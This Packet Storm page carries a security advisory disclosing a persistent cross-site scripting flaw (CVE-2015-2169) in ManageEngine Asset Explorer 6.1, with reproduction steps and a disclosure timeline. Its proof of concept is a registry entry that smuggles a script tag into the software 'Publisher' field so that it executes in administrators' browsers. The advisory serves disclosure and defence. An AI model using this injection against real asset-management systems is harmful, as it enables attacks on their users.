exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine Asset Explorer 6.1 Cross Site Scripting

ManageEngine Asset Explorer 6.1 Cross Site Scripting
Posted Jun 24, 2015
Authored by Suraj Krishnaswami

ManageEngine Asset Explorer version 6.1 suffers from a persistent cross site scripting vulnerability.

tags | exploit, xss
advisories | CVE-2015-2169
SHA-256 | 0e0cbef4faaa90dd611f268ecebd5e06de49fa975ef884e5b752fbdcd43706b1

ManageEngine Asset Explorer 6.1 Cross Site Scripting

Change Mirror Download
Title:
===============
ManageEngine Asset Explorer v6.1 - XSS Vulnerability


CVE-ID:
====================================
CVE-2015-2169


CVSS:
====================================
3.5


Product & Service Introduction (Taken from their homepage):
====================================
ManageEngine AssetExplorer is a web-based IT Asset Management (ITAM)
software that helps you monitor and manage assets in your network from
Planning phase to Disposal phase. AssetExplorer provides you with a number
of ways to ensure discovery of all the assets in your network. You can
manage software & hardware assets, ensure software license compliance and
track purchase orders & contracts - the whole nine yards! AssetExplorer is
very easy to install and works right out of the box.

(Homepage: https://www.manageengine.com/products/asset-explorer/ )


Abstract Advisory Information:
==============================
Cross site scripting attack can be performed on the manage engine asset
explorer. If the 'publisher' name contains vulnerable script, it gets
executed in the browser.


Affected Products:
====================
Manage Engine
Product: Asset Explorer - Web Application 6.1.0 (Build 6112)


Severity Level:
====================
Medium


Technical Details & Description:
================================
Add a vendor with a script in it to the registry.
Login to the product,
Scan the endpoint where the registry is modified.
In the right pane, go to software->Scanned Software

The script gets executed.

Vulnerable Product(s):
ManageEngine Asset Explorer

Affected Version(s):
Version 6.1.0 / Build Number 6112
(Earlier versions i did not test)

Vulnerability Type(s):
Persistent Cross Site Scripting


PoC:
=======================
Add the following registry entry in the machine, for targeted attack.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fake_Software]
"DisplayName"="A fake software 2 installed"
"UninstallString"="C:\\Program Files\\fake\\uninst.exe"
"DisplayVersion"="0.500.20"
"URLInfoAbout"="http://www.dummy.org"
"Publisher"="<script> alert(\"XSS\"); </script>"


Security Risk:
==================
Medium.


Credits & Authors:
==================
Suraj Krishnaswami (suraj.krishnaswami@gmail.com)


Timeline:
==================
Discovered at Wed, March 3, 2015
Informed manage engine about the vulnerability: March 4, 2015
Case moved to development team: March 4, 2015
Asked for updates: March 9, 2015
Asked for updates: March 13, 2015
Asked for updates: April 14, 2015
Public Disclosure at Mon, June 22, 2015


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close